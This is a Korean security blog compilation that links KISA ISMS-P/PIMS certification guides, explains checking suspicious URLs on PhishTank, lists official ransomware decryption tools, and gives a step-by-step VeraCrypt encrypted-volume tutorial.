**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : \[KISA] ISMS/ISMS-P 관련 정보   &#x20;

### [리스트 1. \[KISA\] ISMS-P 인증기준 안내서 (2022.04) \[PDF\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000014/16/FILE_000000000000813/20220422162425837-610988933)

### [리스트 2. \[KISA\] ISMS-P 세부점검항목 공지 (2022.04.22) \[xlsx\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000014/15/FILE_000000000000812/20220422162324297-2020526241)

### [리스트 3. \[KISA\] ISMS-P 인증제도 안내서 (2021.07) \[PDF\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000014/14/FILE_000000000000750/202107141700113011901763919.pdf)

### [리스트 4. \[KISA\] 정보보호\_관리체계(ISMS)\_인증제도\_안내서(2017.04)](#kisa-isms-isms-p)

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# \[KISA] PIMS 관련 정보

\[KISA] 한국인터넷진흥원 PIMS 정보 (모음 자료)

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 :   \[KISA] PIMS 관련 정보

### [리스트 1. PIMS 인증제도 안내서(1권) - 제도운영편 \[PDF\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000002/16/FILE_000000000000218/201704061142399370)

### [리스트 2. PIMS 인증제도 안내서(2권) - 인증기준편 \[PDF\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000002/16/FILE_000000000000219/2017040611423996823)

### [리스트 3. PIMS\_인증기준\_세부점검항목(2016.11.09) \[xlsx\]](https://isms.kisa.or.kr/board/file/bbs_0000000000000002/14/FILE_000000000000103/2017032716401700938) &#x20;

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}


# 피싱 사이트 확인 하는 방법

피싱 사이트 확인 하는 방법

## **피싱 사이트 확인 하는 방법**&#x20;

아무생각 없이 메일이나 문자로 URL 을 눌렀을때 애매한 도메인인 경우 찜찜한 느낌을 감출 수 없을 것입니다.

저도 애매하게 도메인을 누르고 확인 한게 한두번이 아니라서요.

그래서 찾아 보니 외국에서 PhshTank 라는 사이트에서 피싱 여부를 확인 해 주네요.

확실한 피싱과 아직 알려지지 않은 피싱을 검색해 줍니다.

### **Site 바로가기 :** [**https://www.phishtank.com/**](https://www.phishtank.com/)

홈페이지에 들어가면 ""Found a Phishing Site?"" 에 도메인을 입력 하고 엔터를 눌러 주면 아래와 같은 결과를 보여줍니다.

<figure><img src="https://blog.kakaocdn.net/dn/c26UVI/btrNbZgude1/K5RFwMHNDY0kaxOkaPb8gk/img.png" alt=""><figcaption></figcaption></figure>

엔터 또는 ""Is it a phish?"" 을 클릭 하면 아래와 같이 결과를 보여 줍니다.

<figure><img src="https://blog.kakaocdn.net/dn/bj0HuV/btrNeHypOut/5qFLUACtFCmukyqRqk07ek/img.png" alt=""><figcaption></figcaption></figure>

여기에서 ""Screenshot of site :: 사이트 스크린샷"", ""View site in frame :: 프레임에서 사이트 보기"", ""View technical details :: 기술 세부 정보""를 볼 수 있습니다.

* **""Screenshot of site :: 사이트 스크린샷""** 은 해당 사이트를 스크린해 온 이미지 입니다.

<figure><img src="https://blog.kakaocdn.net/dn/mQ9ql/btrNcBeRj0R/4jwJ39qDnukHw6wvFXkTwK/img.png" alt=""><figcaption></figcaption></figure>

* **"View site in frame :: 프레임에서 사이트 보기""** 은 해당 사이트를 접속하는 화면입니다. 접속하시면 피해가 갈 수 있으니 조심하시기 바랍니다.

<figure><img src="https://blog.kakaocdn.net/dn/qYGGm/btrNdTy6rpU/CxNbfuNouGLwZzDo30APkK/img.png" alt=""><figcaption></figcaption></figure>

* **"View technical details :: 기술 세부 정보""** 은 해당 사이트를 스크린해 온 이미지 입니다.

<figure><img src="https://blog.kakaocdn.net/dn/bFwEeG/btrNcz2o9cK/7QkQrMBoTKt6x4EdaZ6ar1/img.png" alt=""><figcaption></figcaption></figure>

피해가 가기전에 피싱 사이트를 신고 하시기 바랍니다.

### **KISA 바로가기(피싱ㆍ스미싱 사고) :** [**https://www.krcert.or.kr/consult/phishing.do**](https://www.krcert.or.kr/consult/phishing.do)

피해가 없으시길 바랍니다.

<br>

\#피싱 #피싱 사이트 #피싱 사이트 확인 #phishtank #phishtank 사용법 #피싱 확인 # 피싱ㆍ스미싱 사고 #피싱신고 #스미싱신고


# \[KISA] 랜섬웨어 복구도구 모음

\[KISA] 랜섬웨어 복구도구 모음

## \[KISA] 랜섬웨어 복구도구 모음

### **\* Hive 랜섬웨어 통합 복구도구(버전1\~버전4)**

#### [1. Hive\_Ransomware\_Integrated\_Decryption\_Tool.zip \[53.0K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000417\&MNK=MN_0000001279) [2. Hive\_Ransomware\_Integrated\_Decryption\_Tool\_User\_Manual(ENG).pdf \[715.7K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000422\&MNK=MN_0000001279) [3. Hive\_랜섬웨어\_통합\_복구도구\_사용\_매뉴얼.pdf \[784.6K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000423\&MNK=MN_0000001279)

### **\* Ragnar 랜섬웨어 복구도구**

#### [1. Ragnar\_랜섬웨어\_복구도구\_사용\_매뉴얼.pdf \[467.8K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000414\&MNK=MN_0000001279) [2. Ragnar\_Ransomware\_Decryption\_Tool.zip \[5.7M\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000415\&MNK=MN_0000001279)

### **\* Darkside 랜섬웨어 복구도구**

#### [1. 복구 도구 및 자세한 설명 바로가기](https://www.bitdefender.com/blog/labs/darkside-ransomware-decryption-tool/)

### **\* REvil/Sodinokibi 랜섬웨어 복구도구**

#### [1. 복구 도구 및 자세한 설명 바로가기](https://www.bitdefender.com/blog/labs/bitdefender-offers-free-universal-decryptor-for-revil-sodinokibi-ransomware/)

### **\* Djvu 랜섬웨어 복구도구**

#### [1. 복구 도구 및 자세한 설명 바로가기](https://www.emsisoft.com/ransomware-decryption-tools/stop-djvu)

### **\* LooCipher 랜섬웨어 복구도구**

#### [1. LooCipher\_랜섬웨어\_복구도구\_사용\_매뉴얼.pdf \[184.9K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000390\&MNK=MN_0000001279) [2. LooCipher\_decryptor.zip \[86.6K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000391\&MNK=MN_0000001279) [3. LooCipher\_Ransomware\_Decryption\_Tool\_Instruction\_Manual.pdf \[131.1K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000405\&MNK=MN_0000001279)

### **\* SimpleLocker 랜섬웨어 복구도구**

#### [1. SimpleLocker 랜섬웨어 암호기능 분석 보고서.pdf \[449.7K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000240\&MNK=MN_0000001279) [2. SImplelocker 복구도구 사용 매뉴얼.pdf \[171.4K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000301\&MNK=MN_0000001279) [3. SImplelocker decryptiontool user manual.pdf \[120.1K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000302\&MNK=MN_0000001279) [4. decrypt simplelocker.zip \[4.0M\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000303\&MNK=MN_0000001279)

### **\* Magniber 랜섬웨어 복구도구**

#### [1. Magniber 랜섬웨어 암호기능 분석 보고서.pdf \[580.5K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000239\&MNK=MN_0000001279) [2. decrypt magniber(.kgpvwnr).zip \[2.4M\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000298\&MNK=MN_0000001279) [3. Magniber 복구도구 사용 매뉴얼.pdf \[173.7K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000299\&MNK=MN_0000001279) [4. Magniber decryption tool user manual.pdf \[123.0K\] ](https://seed.kisa.or.kr/async/MultiFile/download.do?FS_KEYNO=FS_0000000300\&MNK=MN_0000001279)

<br>

피해 당하지 않게 조심 하시기 바랍니다.

또한 피해 보신 분들은 KISA 에 스팸 신고도 해 주시기 바랍니다.

<br>

출처 : [KISA 바로가기](https://seed.kisa.or.kr/)&#x20;

<br>


# 베라크립트(VeraCrypt) 을 이용하여 암호화된 가상 디스크 만들기

베라크립트(VeraCrypt) 을 이용하여 암호화된 가상 디스크 만들기

## 베라크립트(VeraCrypt) 을 이용하여 암호화된 가상 디스크 만들기

<br>

### **베라크립트(VeraCrypt) 란 무엇인가?**

베라크립트(VeraCrypt) 는 OFTE를 위해 사용되는 오픈 소스 유틸리티이다. 파일 안에 암호화된 가상 디스크를 만들거나 파티션이라든지 완전한 기억 장치를 사전 부팅 인증을 사용하여 암호화할 수 있다. 베라크립트는 지금은 개발이 중단된 트루크립트 프로젝트의 포크이다.

<br>

### **그럼 이제 베라크립트(VeraCrypt) 를 설치 해 보자**

먼저 해당 홈페이지에 방문하여 파일을 다운로드 받습니다. - [사이트 바로가기](https://www.veracrypt.fr/en/Downloads.html) -&#x20;

<br>

Windows/macOS/Linux 등 다양한 OS 에 설치가 가능 합니다.

<br>

자신의 OS 에 맞는 파일을 다운로드 받으시고 실행 및 설치를 진행 하시기 바랍니다.

\-- 설치 는 생략 --

<br>

실행 하면 아래와 같은 화면을 보여 줍니다.

![](https://blog.kakaocdn.net/dn/y79Js/btrHIeh8peE/CuaKLHjY2y0dZNACvt13kk/img.png)

새로운 볼륨을 만들기 위해 "Create Volume" 을 클릭 합니다.

![](https://blog.kakaocdn.net/dn/bxMgiM/btrHIeJddrS/4fhChcKiaesWtXNi2e0Kx1/img.png)

위의 화면에서 "Next" 를 클릭 합니다.

그럼 아래의 화면처럼 Volume Location 화면이 보이며 "Select File..." 를 클릭 합니다.

![](https://blog.kakaocdn.net/dn/bjDuVm/btrHEXOXyIA/suYDF3H2VgCcbkWAXk36P0/img.png)

위의 화면에서 용량이 큰 드라이브를 선택하여 "자료 폴더" 등의 이름으로 폴더를 만들고 파일이름은 날짜 "20220719" 로 하였습니다.&#x20;

![](https://blog.kakaocdn.net/dn/owkYy/btrHIf2qUnS/V0ZdxM7t8jZuE8BRVxcM5k/img.png)

위의 화면처럼 경로와 파일명이 선택 되었습니다. "Next" 를 클릭 합니다.

아래와 같이 Encryption Algorithm 선택과 Hash Algorithom 을 선택 합니다.

![](https://blog.kakaocdn.net/dn/WfaBS/btrHJaTBJUE/nS5zYi78p3SXgqxOyqIu7k/img.png)

저는 Serpent(Twofish(AES)) 와 SHA-512 를 선택 하였습니다. "Next" 를 클릭 합니다.

![](https://blog.kakaocdn.net/dn/5eX2T/btrHIYTCGbI/0bHqNofATMPaDqr3wYTvFK/img.png)

위의 그림처럼 500 GB 로 설정 하여 "Next" 를 진행 합니다.

![](https://blog.kakaocdn.net/dn/cyBRsm/btrHIGySgTA/Ro0grimAsozhXHeWjcocY0/img.png)

위의 화면은 비밀번호를 입력하는 곳입니다. **숫자/영문자/특수문자를 포함하여 8자리 이상**으로 설정 하셔야 합니다.

해당 프로그램에서는 20자리 이상의 비밀번호를 입력 하라고 합니다. 전 숫자/영문자/특수문자를 포함한 8자리 이상으로 설정 하였습니다. "Next" 를 클릭 하여 진행 합니다.

![](https://blog.kakaocdn.net/dn/cbQdg6/btrHEYtRVJi/ud6unaqhSlMulxdHJazQOK/img.png)

위의 화면은 4G 이상의 큰 파일에 대한 설정 입니다. "yes or no"를 선택 후 "Next" 를 클릭 합니다.

![](https://blog.kakaocdn.net/dn/9bM1R/btrHJK1w8m5/tZPEqrORHNO3421O5K9fUK/img.png)

이제 Volume Format 을 진행 합니다. 먼저 Filesystem 은 "exFAT" 와 Cluster 는 "Default" 로 설정 해 주시면 됩니다.

또한 Quick Format, Dynamic 은 상황에 따라 체크 후 진행 하시면 됩니다. "Fromat" 을 클릭 하면 아래와 같은 화면이 진행 됩니다.

![](https://blog.kakaocdn.net/dn/bKB8Xk/btrHDQvIxz7/RSE5lOi4ZXgKyMmUORhM2K/img.png)

제 PC에서 500 GB 에 37분이 소요 되네요. Format 이 정상적으로 완료 되면 아래의 화면처럼 끝납니다.

![](https://blog.kakaocdn.net/dn/bk49gr/btrHIZSwTYP/MhQ4nvcTwaHL7obW77kRL1/img.png)

그럼 이제 연결 하는 방법을 보여드리겠습니다.

먼저 드라이브를 선택 한 후 "Volume" 에서 "Select File..." 을 클릭 후 해당 폴더의 파일을 선택 합니다.

여기서 "Never save history" 는 체크를 해제 합니다.

그리고 "Mount" 버튼을 클릭 합니다.

![](https://blog.kakaocdn.net/dn/cU9JZ1/btrHJy1fpuS/1HtBHcpaVCbxk2yQmW2nn1/img.png)

아래의 화면은 비밀번호를 입력 하는 부분입니다.

![](https://blog.kakaocdn.net/dn/bVyhmO/btrHIfuQv1m/2nqmjNXIpJPYRMi4GbFi8k/img.png)

비밀번호를 정상적으로 입력 하면 아래의 화면을 통해 Z 드라이브로 연결된 화면을 볼 수 있습니다.

![](https://blog.kakaocdn.net/dn/NbA3j/btrHIYe3Msl/PCLofcHvUuKRNqBTkKhiJ1/img.png)

탐색기를 열어서 Z 드라이브로 접속 하시면 됩니다.

![](https://blog.kakaocdn.net/dn/cnqY1z/btrHJa0Cidh/P3WZlY06KRlOcvLJq6OIm0/img.png)

로그오프나 재부팅 후엔 다시 VeraCrypt 를 실행하여 드라이브를 다시 마운트 해야 합니다.

<br>

### **\*\* 이제 안전하게 나의 자료를 보관 할 수 있습니다.**

### \*\* 설치시 유의사항

| <p>i5 미만의 CPU에서는 시스템이 베라크립트를 버티지 못하는 경우가 종종 발생하고 있다.<br><br>PC 사용중 갑자기 컴퓨터가 멈춰버리거나 자동으로 재부팅 되는 경우가 있다.<br><br>노트북보다는 데스크톱에서 그나마 잘 동작하며, I7 이상의 CPU를 사용해야 문제 없이 동작한다.<br><br>하드웨어 가속인 AES-NI를 지원하는 프로세서라면 AES암호화 사용시 별 무리 없이 사용이 가능하다.<br><br><strong>간혹 부트로더를 멋대로 날려버려 블루스크린이 출력되는 경우가 있어 주의를 요한다.</strong><br><br>이에 대비해 백업본을 생성할 수 있으나, 백업본을 외부에 백업하면 베라크립트를 사용하는 의미가 없다는 모순이 생긴다. 노트북에서 분실시 데이터 유출 방지용으로 사용하는 정도에나 의미가 있다. 다만 이러한 경우는 TPM+비트락커로도 충분한 경우가 많다.</p> |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |

\#베라크립트 #VeraCrypt #가상드스크 #암호화된 가상 디스크 만들기 #디스크 암호화 #설치시 유의사항 #안전한 디스크 #안전한 가상 디스크 #보안 #해킹


